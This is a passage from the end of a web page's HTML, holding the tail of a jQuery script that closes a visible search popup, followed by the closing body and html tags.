        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
